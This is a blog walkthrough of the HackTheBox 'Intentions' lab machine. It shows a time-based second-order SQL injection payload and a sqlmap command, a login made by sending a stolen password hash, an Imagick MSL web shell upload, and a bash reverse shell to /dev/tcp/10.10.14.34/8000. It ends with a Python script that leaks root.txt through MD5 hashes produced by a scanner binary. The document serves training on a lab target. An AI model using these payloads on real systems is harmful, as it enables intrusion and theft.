.png)
5 months ago
47 BOOK THIS SPACE FOR AD
ARTICLE AD
Hey, fellow Hackers! Today, we’re going to dive into the Intentions HackTheBox Machine. Let’s jump right in and have some fun!
Let’ start with scanning target ip using nmap
nmap -F -sV 10.10.11.220Result
Nmap scan report for intentions.htb (10.10.11.220)Host is up (0.32s latency).
Not shown: 98 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We got two open port i.e. 80 and 22
Before doing anything i added intentions.htb inside /etc/hosts file.
After accessing website we got a login and registration form.
I started directory enumeration using dirb
dirb http://intentions.htb/Result:
I tried accessing them one by one, robots.txt is empty and for other we had to login into a account. I register a new user and login into account.
Here we got some section like profile etc. Here i started enumerating .js file for found admin directory using dirb tool
dirb http://intentions.htb/js/ -X .jsResult:
---- Scanning URL: http://intentions.htb/js/ ----+ http://intentions.htb/js/admin.js (CODE:200|SIZE:311246)
+ http://intentions.htb/js/app.js (CODE:200|SIZE:433792)
+ http://intentions.htb/js/gallery.js (CODE:200|SIZE:310841)
+ http://intentions.htb/js/login.js (CODE:200|SIZE:279176)
+ http://intentions.htb/js/mdb.js (CODE:200|SIZE:153684)
Here we got some js files i tried accessing admin.js using curl
curl http://intentions.htb/js/admin.jsand at the end of this result i found some text message inside code
i copy below script code and on google i search for online javascript beautifier for formating this code and got a website : https://beautifier.io/
here i added this script code and beautify this code and then we can able to see this in much better format
Messages we found:
Recently we ‘ve had some copyrighted images slip through onto the gallery. This could turn into a big issue for us so we are putting a new process in place that all new images must go through our legal council for approval. Any new images you would like to add to the gallery should be provided to legal with all relevant copyright information.
I’ve assigned Greg to setup a process for legal to transfer approved images directly to the server to avoid any confusion or mishaps.\n This will be the only way to add images to our gallery going forward.
Hey team, I ‘ve deployed the v2 API to production and have started using it in the admin section. Let me know if you spot any bugs.
This will be a major security upgrade for our users, passwords no longer need to be transmitted to the server in clear text!
By hashing the password client side there is no risk to our users as BCrypt is basically uncrackable.
This should take care of the concerns raised by our users regarding our lack of HTTPS connection.
The v2 API also comes with some neat features we are testing that could allow users to apply cool effects to the images. I’ve included some examples on the image editing page, but feel free to browse all of the available effects
for the module and suggest some:
Now we know there is user named as greg a v2 API in production and Password hashing client side with BCrypt.
Then i load my burpsuite for analysing all web page, After going through all page on by one i found there’s a input section in profile section
Here i tried bunch of sql payloads and finally discover a payload that working :
';WAITFORDELAY'0:0:10'--after adding when i go to feed section i get time delay.
I capture both request in burpsuite and store in different file named as req.txt and req2.txt that’s i am going to specify in sqlmap tool :)
sqlmap -r req.txt --second-req req2.txt --tamper=space2comment --random-agent --batch --dump -T users -D intentionsI have both user’s password hash but not able to crack them. As we know we found in admin.js that in v2 API password no longer need to be transmitted to the server in clear text so i decide to trasmit hash for authentication as other user
While logging into the web app i send post request to /api/v2/auth/login with a json payload containing user credentials
and boom we able to access steve user
with this account we can access to /admin directory that we found before
http://intentions.htb/admin/We can see there is a new image button:
We can view different images and apply filters too
Intercepting filters with burpsuite we got the following request.
We know that they are using imagick php library for these cool filter effects i tried searching for this exploit and found a version of imagick that suffer from a vulnerability known as “ImageTragick”.
I tried bunch of things including using online available ImageTragick exploit etc. But didn’t work :(
Later i found a POC that we can use to move further: https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/
Steps to get Shell:
Above blog POC discusses a method for uploading a php web shell by exploiting a vulnerability in MSL “Magick Scripting Language”.
I combine everything in one request and uploaded a web shell named as doge.php :)
Result:
After getting result of our php web shell i open up my netcat listner on port 8000
rlwrap nc -nvlp 8000and i change the request method from get to post for gaining reverse shell
POST /doge.php HTTP/1.1Host: intentions.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vaW50ZW50aW9ucy5odGIvYXBpL3YyL2F1dGgvbG9naW4iLCJpYXQiOjE3MTg2MjMxOTQsImV4cCI6MTcxODY0NDc5NCwibmJmIjoxNzE4NjIzMTk0LCJqdGkiOiJXTVk4Tm5FUWtsYklJSmZJIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.udALEmZs9YxOJ-8lZrIpPFCl7kCU-yQdaGXx9Mv51Hk; XSRF-TOKEN=eyJpdiI6IlBnOEVoSDV5NHJMWVRBaU9mRmpKT3c9PSIsInZhbHVlIjoiY3RuTFB3d3NIMDdUZUdrRjd0RW5mZEtPdHVTWmdjVkRyVTNsbVBleHBnWGUrM0srbFRIR1pzbzR1Z2d0eE40dThUa253U3FZcG5OM1htNG9rck5MSU5mUkJkREUvY3k0Rk1LUkIyL3FFMUlyZnpRM0JOSktFVXpSd09Renc3dDMiLCJtYWMiOiI3YTA1YzUzY2U4YjZkOWUwY2E3MzA2ZTVlMGUyODQ2Mjg4YTFmNGFiODA3M2YxMmUzYTZiOTA1ZDBlMGQyMDgxIiwidGFnIjoiIn0%3D; intentions_session=eyJpdiI6Imp1bTd0ajFyYmJ4Y0NQU20yK0srbkE9PSIsInZhbHVlIjoiclRyZy9BWUZ6SGhpeW1iUGNpeldoVGI2eGVTRjVzcTVqWGZQZTMzd3gwcWRNbGk3UExOaWdGakQxdnByeERBYml5RHJkWmJEZG1tcmEvaFJIaTBDK3A4YkVmZWVhZEtRT1pkWE5OWVlGTDVXamNIbktkWFpyb3BhZEJQTzh6UVEiLCJtYWMiOiIzN2U1MTJjNzFhMDQ4NTAyZjgwOGE4Mjk1Y2YwYWI1NWM5ZWRmMTljOWIwYjRhNDQzMWJhZWMyZDMzMWExMGYyIiwidGFnIjoiIn0%3D
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.34/8000+0>%261'
and in response i get www-data shell :)
Then i gain tty shell using python
python3 -c 'import pty;pty.spawn("/bin/bash")'After little bit enumeration i find a .git directory inside /html/intentions
For downloading this file in our local system i first create a copy of this .git directory inside /tmp
cp -r .git/ /tmp/Then i create a .tar archive using tar
tar -cf git.tar .gitand finally i move this file inside public directory so we can download this using wget
www-data@intentions:~/html/intentions/public$ mv /tmp/git.tar .mv /tmp/git.tar .
www-data@intentions:~/html/intentions/public$
For downloading
wget http://10.10.11.220/git.tarthen i extract this tar file
tar -xvf git.tarand using git log i found something interesting
Using git diff option i found greg user password
Then using ssh i access this user shell
in current directory i found user.txt with some other script and .txt file
greg@intentions:~$ lsdmca_check.sh dmca_hashes.test user.txt
after reading its content i found out it’s using a binary /opt/scanner/scanner
and this is what scanner binary do
greg@intentions:~$ /opt/scanner/scannerThe copyright_scanner application provides the capability to evaluate a single file or directory of files against a known blacklist and return matches.
This utility has been developed to help identify copyrighted material that have previously been submitted on the platform.
This tool can also be used to check for duplicate images to avoid having multiple of the same photos in the gallery.
File matching are evaluated by comparing an MD5 hash of the file contents or a portion of the file contents against those submitted in the hash file.
The hash blacklist file should be maintained as a single LABEL:MD5 per line.
Please avoid using extra colons in the label as that is not currently supported.
Expected output:
1. Empty if no matches found
2. A line for every match, example:
[+] {LABEL} matches {FILE}
-c string
Path to image file to check. Cannot be combined with -d
-d string
Path to image directory to check. Cannot be combined with -c
-h string
Path to colon separated hash file. Not compatible with -p
-l int
Maximum bytes of files being checked to hash. Files smaller than this value will be fully hashed. Smaller values are much faster but prone to false positives. (default 500)
-p [Debug] Print calculated file hash. Only compatible with -c
-s string
Specific hash to check against. Not compatible with -h
The scanner tool identify copyrighted material by evaluating files or directories against a known blacklist of hashes. It calculates the MD5 hash of the file contents and compares it to those provided in the hash file.
We can use this tool to read the contents of files
greg@intentions:~$ /opt/scanner/scanner -c /root/root.txt -l 1 -p -s abcd[DEBUG] /root/root.txt has hash 45c48cce2e2d7fbdea1afc51c7c6ad26
In above command we define /root.txt file that we wanna read with -l flag for max bytes of the file to be hashed, with debug and finally we provide something to check against, that can be anything.
If we decrypt the value of output hash we get 9 value that can be first character of that file. We can automate this process by writing a script :)
I write a python script that give me root flag
import hashlibimport subprocess
charset = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ !"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
result = ""
def get_hash(pos, file):
command = ["/opt/scanner/scanner", "-c", file, "-l", str(pos), "-p", "-s", "aaaa"]
process = subprocess.run(command, capture_output=True, text=True)
output = process.stdout.strip()
return output.split()[-1]
def find_char(temp_hash):
global result
for ch in charset:
test_data = result + ch
current_hash = hashlib.md5(test_data.encode()).hexdigest()
if temp_hash == current_hash:
return ch
return ""
def main():
file = input("File: ")
pos = 1
while True:
temp_hash = get_hash(pos, file)
new_char = find_char(temp_hash)
if not new_char:
break
else:
global result
result += new_char
pos += 1
print(result)
if __name__ == "__main__":
main()
BOOOMM!! Intention solved successfully :)
Happy Hacking :)
Bengali (Bangladesh) · 
English (United States) ·